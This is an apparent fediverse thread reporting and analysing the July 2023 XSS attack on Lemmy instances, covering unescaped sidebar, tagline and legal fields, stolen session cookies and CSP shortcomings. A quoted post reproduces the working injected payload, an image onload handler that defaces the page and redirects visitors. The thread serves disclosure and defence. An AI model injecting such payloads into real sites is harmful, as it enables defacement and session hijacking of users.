http.jamesJul 10, 2023

Wow, I open my #Lemmy feed and the first thing I see is a new #XSS exploit in the markdown parser. That’s not good… I’m glad I’m strictly using third party clients.

https://sh.itjust.works/post/923025

#Security

(URGENT) Lemmy has an XSS vulnerability in the tagline, the sidebar and in the legal information field - sh.itjust.works

# DO NOT OPEN THE “LEGAL” PAGE — lemmy.world is a victim of an XSS attack right now and the hacker simply injected a JavaScript redirection into the sidebar. It appears the Lemmy backend does not escape HTML in the main sidebar. Not sure if this is also true for community sidebars. [https://sh.itjust.works/pictrs/image/707c0f16-3d5c-4888-b865-34228d968ee6.png] EDIT: the exploit is also in the tagline that appears on top of the main feed for status updates, like the following one for SDF Chatter: [https://sh.itjust.works/pictrs/image/2dc8838f-4611-4b62-92d2-ab45d7b1c560.png] [https://sh.itjust.works/pictrs/image/9195ec9c-166e-4190-a991-26d218089602.png] EDIT 2: The legal information field also has that exploit, so that when you go to the “Legal” page it shows the HTML unescaped, but fortunately (for now) he’s using double-quotes. "legal_information":" ![\" onload=\"if(localStorage.getItem(`h`) != `true`){document.body.innerHTML = `\u003Ch1\u003ESite has been seized by Reddit for copyright infringment\u003C\u002Fh1\u003E`; setTimeout(() =\u003E {window.location.href = `https:\u002F\u002Flemmy.world\u002Fpictrs\u002Fimage\u002F7aa772b7-9416-45d1-805b-36ec21be9f66.mp4`}, 10000)}\"](https:\u002F\u002Flemmy.world\u002Fpictrs\u002Fimage\u002F66ca36df-4ada-47b3-9169-01870d8fb0ac.png \"lw\")

Show threadhttp.james

The JS is being inserted inline via images. Why didn’t Lemmy restrict this in the CSP in the first place?

The attacker took their time to obfuscate the code…

Image credit: AlmightySnoo @ sh.itjust.works

Jul 10, 2023 at 5:16amWeb
Show threadhttp.jamesJul 10, 2023
Cookies are being stolen through this vulnerability (unsurprisingly), aka session hijacking. Seeing as Lemmy uses JWTs, I really hope they maintain the ability to invalidate sessions. Otherwise, accounts will be stolen and there’s almost nothing people will be able to do about it after the fact.
Show threadhttp.jamesJul 10, 2023

The #markdown logic from this file (https://github.com/LemmyNet/lemmy-ui/blob/main/src/shared/markdown.ts) is used in the sidebar and other components. The popular markdown library “markdown-it” is being used as the backbone.

The dangerouslySetHTML prop is being set to true, which overrides #React’s built-in security protections. It looks like the #Lemmy team got unlucky with an insecure library.

Update: The markdown parser was not the root of the issue. Instead, it was the custom emoji logic.

LemmyNet/lemmy-ui

The official web app for lemmy. Contribute to LemmyNet/lemmy-ui development by creating an account on GitHub.

GitHub
Show threadhttp.jamesJul 10, 2023
Active discussions here: https://github.com/LemmyNet/lemmy-ui/issues/1895
Possible XSS attack · Issue #1895 · LemmyNet/lemmy-ui

Requirements This is a bug report, and if not, please post to https://lemmy.ml/c/lemmy_support instead. Please check to see if this issue already exists. It's a single bug. Do not report multiple b...

GitHub
Show threadJob BautistaJul 10, 2023
@httpjames Apparently they did at first, but it somehow got reintroduced in 2022, and just didn't get attention after that at all: https://github.com/LemmyNet/lemmy-ui/issues/83
Remove inline Javascript · Issue #83 · LemmyNet/lemmy-ui

This is the main thing Mozilla Observatory complains about regarding our Content Security Policy. https://observatory.mozilla.org/analyze/enterprise.lemmy.ml

GitHub